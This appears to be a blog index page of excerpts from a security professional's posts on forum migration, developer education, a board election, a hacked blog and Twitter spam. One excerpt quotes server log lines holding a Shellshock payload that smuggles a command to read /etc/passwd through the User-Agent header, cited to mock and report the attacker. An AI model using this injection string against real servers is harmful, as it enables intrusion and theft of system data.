In a life a long time ago in early 2002, we had to move Australia’s largest Volkswagen car forum from EzyBoard, which was distributing malicious ads and hard-to-get-rid-of pop-ups to our users, to our own forum software. After a product selection, I chose XMB, which was (and is) better than… Read More


I looked back at the “predictions” for 2010, a post I wrote five years ago, and found that besides the dramatic increase in mobile assessments this last year or two, the things I was banging on about in 2009 are still issues today: Developer education is woeful. I recently did an education piece for a developer… Read More


85.25.242.250 - - [28/Sep/2014:09:20:12 -0400] "GET / HTTP/1.1" 301 281 "-" "() { foo;};echo;/bin/cat /etc/passwd"
85.25.242.250 - - [28/Sep/2014:22:30:48 -0400] "GET / HTTP/1.1" 500 178 "-" "() { foo;};echo;/bin/cat /etc/passwd"

Dear very stupid attacker, you have the opsec of a small kitten who is surprised by his own tail. Reported.… Read More


I have formally submitted my name to be in the Board Elections 2014. I am standing for: Reforming the Board. We need to improve the independence, ethics and dispute resolution processes. I will be a root and branches reformer to encourage the Board to make a couple of the positions available to truly independent directors.… Read More


Passwords. Pah. After running my blog on various virtual hosts and VPSs since 1998, my measures put into place to protect this site and the others on here were insufficient to protect against weak passwords. Let’s just say that if you are a script kiddie and know all about press.php, tmpfiles.php and others, you have terrible operational… Read More


In the last few weeks, a prominent researcher, Dragos Ruiu (@dragosr) has put his neck out describing some interesting issues with a bunch of his computers. If his indicators of compromise are to be believed (and there is the first problem), we have a significant issue. The problem is the chorus of “It’s not real”… Read More


So I’m getting a lot of Twitter spam with links to install bad crap on my computer. More than just occasionally, these DMs are sent by folks in the infosec field. They should know better than to click unknown links without taking precautions. So what do you need to do? Simple. Follow these basic NIST… Read More


This post is a last resort as I’ve had two comments rejected by the moderators at The Register, one of my favorite IT news websites. Lewis Page is a regular contributor to the Register. For whatever reason, around 50% of his total output there is (willful mis-) reporting on various papers and research on climate… Read More